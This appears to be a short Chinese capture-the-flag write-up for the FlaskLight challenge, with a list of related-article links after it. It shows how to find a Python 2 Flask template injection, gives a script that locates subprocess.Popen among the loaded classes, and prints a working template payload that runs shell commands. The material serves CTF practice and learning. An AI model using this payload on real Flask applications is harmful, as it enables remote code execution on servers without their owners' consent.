[CSCCTF 2019 Qual]FlaskLight 記錄
這個根據題目名字,flask模板注入,找注入點
檢視原始碼發現GET傳參
直接測試模板注入
存在sql注入
常規模板注入
試了試之前做過的模板注入,都行不通
然後百度了一波,原來這是python2的
難怪不行
{{''.__class__.__mro__[2].__subclasses__()}}
利用這個可以讀取所有的類,然後看看能不能RCE
找到catch_warnings類,
但是無法RCE
看了wp,發現可以利用subprocess.Popen這個類來進行RCE
學廢了
網上搜的模板注入,都沒說這個類,emmmm
找索引
import requests
import html
import time
for i in range(0,300):
time.sleep(0.06)
url='http://4d0aed10-26a2-4108-8b17-9c8aa555ca2d.node3.buuoj.cn?search={{\'\'.__class__.__mro__[2].__subclasses__()[%d]}}' %(i)
r = requests.get(url)
print(url)
if "subprocess.Popen" in html.unescape(r.text):
print(i)
break
索引為258
payload
{{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
檢視flasklight目錄
另外一個就是flag
相關文章
- PUTTY 記錄操作記錄
- [20190706]行記錄是否記錄了各欄位在行位置的起始地址.txt
- 域名解析的記錄型別:A記錄、CNAME、MX記錄、NS記錄型別
- C語言學習記錄_2019.02.06C語言
- Cookie記錄瀏覽記錄Cookie
- Xshell 5 記錄操作記錄
- 2019騰訊實習筆試題部分記錄+兩次電話面試筆記筆試面試筆記
- 淘寶記錄筆記筆記
- 面試記錄面試
- Git記錄Git
- 命令記錄
- 工具記錄
- 地址記錄
- 機器學習記錄機器學習
- explain記錄AI
- GitText記錄Git
- 思路記錄
- MyBatis記錄MyBatis
- MongoDB 記錄MongoDB
- 記錄一次測開面試題記錄面試題
- 記錄Effective Objective C 2 0筆記目錄Object筆記
- AOP記錄異常郵件傳送記錄
- db2不記錄日誌插入記錄DB2
- [記錄]curl命令筆記筆記
- Core Animation 筆記記錄筆記
- 【每日學習記錄】使用錄影裝置記錄每天的學習
- 記錄使用 guzzlehttp 異常捕獲踩坑記錄HTTP
- 學習記錄Spring Boot 記錄配置細節Spring Boot
- 用“稽核物件”功能記錄檔案刪除記錄物件
- 文章地址記錄
- docker 命令記錄Docker
- 面試題記錄面試題
- Nuxt記錄-asyncDataUX
- planetype記錄
- Mac使用記錄Mac
- 面試記錄2面試
- phpword使用記錄PHP
- css使用記錄CSS